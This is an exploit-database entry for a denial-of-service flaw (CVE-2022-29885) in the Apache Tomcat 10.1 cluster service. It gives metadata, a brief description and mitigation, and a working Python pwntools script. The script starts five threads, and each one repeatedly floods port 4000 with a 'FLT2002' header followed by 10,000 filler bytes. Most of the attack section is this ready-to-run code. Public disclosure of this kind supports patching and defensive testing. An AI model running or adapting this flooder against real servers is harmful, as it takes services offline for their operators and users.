Apache Tomcat 10.1 - Denial Of Service

vendor:

Tomcat

by:

Cristian 'void' Giustini

7.5

CVSS

HIGH

Denial Of Service

400

CWE

Product Name: Tomcat

Affected Version From: 10

Affected Version To: 10.1

Patch Exists: YES

Related CWE: CVE-2022-29885

CPE: a:apache:tomcat:10.1

Metasploit: https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-29885/, https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2022-29885/, https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2022-29885/

Other Scripts:

Platforms Tested: Windows, Linux, Mac

2022

Apache Tomcat 10.1 – Denial Of Service

A denial of service vulnerability exists in Apache Tomcat 10.1, which could allow an attacker to cause a denial of service condition. This vulnerability is due to an improper handling of requests in the cluster service. An attacker can exploit this vulnerability by sending a specially crafted request to the cluster service. Successful exploitation of this vulnerability could allow an attacker to cause a denial of service condition.

Mitigation:

To mitigate this vulnerability, users should upgrade to the latest version of Apache Tomcat 10.1. Additionally, users should ensure that the cluster service is properly configured and that all requests are properly handled.

Source

Exploit-DB raw data:

# Exploit Title:  Apache Tomcat 10.1 - Denial Of Service
# Google Dork: N/A
# Date: 13/07/2022
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-10.cgi
# Version: <= 10.1
# Tested on: Apache Tomcat 10.0 (Docker)
# CVE : CVE-2022-29885 (CVE Owner: 4ra1n)
# Exploit pre-requirements: pip install pwntools==4.8.0
# Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/ 

 

 

#!/usr/bin/env python3

# coding: utf-8

from pwn import *

import time

import threading

import subprocess

threads = []

 

 

def send_payload():

    r = remote("localhost", 4000)

    while True:

        r.send(b"FLT2002" + b"A" * 10000)

 

for _ in range(5):

    new_thread = threading.Thread(target=send_payload)

    threads.append(new_thread)

    new_thread.start()

for old_thread in threads:

    old_thread.join()